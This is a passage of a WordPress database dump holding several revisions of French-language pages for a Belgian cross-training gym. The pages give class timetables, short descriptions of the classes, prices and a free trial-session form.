(276, 1, '2013-07-03 20:45:08', '2013-07-03 20:45:08', 'Venez découvrir les bienfaits du cross training lors d\'une première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-07-03 20:45:08', '2013-07-03 20:45:08', '', 266, 'http://www.crosstrainingcenter.be/?p=276', 0, 'revision', '', 0),
(277, 1, '2013-07-03 20:48:13', '2013-07-03 20:48:13', '<h1>Une séance gratuite?</h1>\r\nEnvie de découvrir les bienfaits du cross training?\r\nNous vous offrons gratuitement une première séance.\r\nRemplissez le formulaire ci-dessous et nous vous recontacterons pour planifier avec vous votre première séance. \r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-07-03 20:48:13', '2013-07-03 20:48:13', '', 266, 'http://www.crosstrainingcenter.be/?p=277', 0, 'revision', '', 0),
(317, 1, '2013-07-04 16:35:10', '2013-07-04 16:35:10', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:35:10', '2013-07-04 16:35:10', '', 11, 'http://www.crosstrainingcenter.be/11-revision-104/', 0, 'revision', '', 0),
(278, 1, '2013-07-03 20:45:06', '2013-07-03 20:45:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 20:45:06', '2013-07-03 20:45:06', '', 11, 'http://www.crosstrainingcenter.be/?p=278', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(279, 1, '2013-07-03 21:04:43', '2013-07-03 21:04:43', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 21:04:43', '2013-07-03 21:04:43', '', 11, 'http://www.crosstrainingcenter.be/?p=279', 0, 'revision', '', 0),
(321, 1, '2013-07-10 15:43:05', '2013-07-10 15:43:05', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:43:05', '2013-07-10 15:43:05', '', 11, 'http://www.crosstrainingcenter.be/11-revision-108/', 0, 'revision', '', 0),
(280, 1, '2013-07-04 16:23:57', '2013-07-04 16:23:57', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids 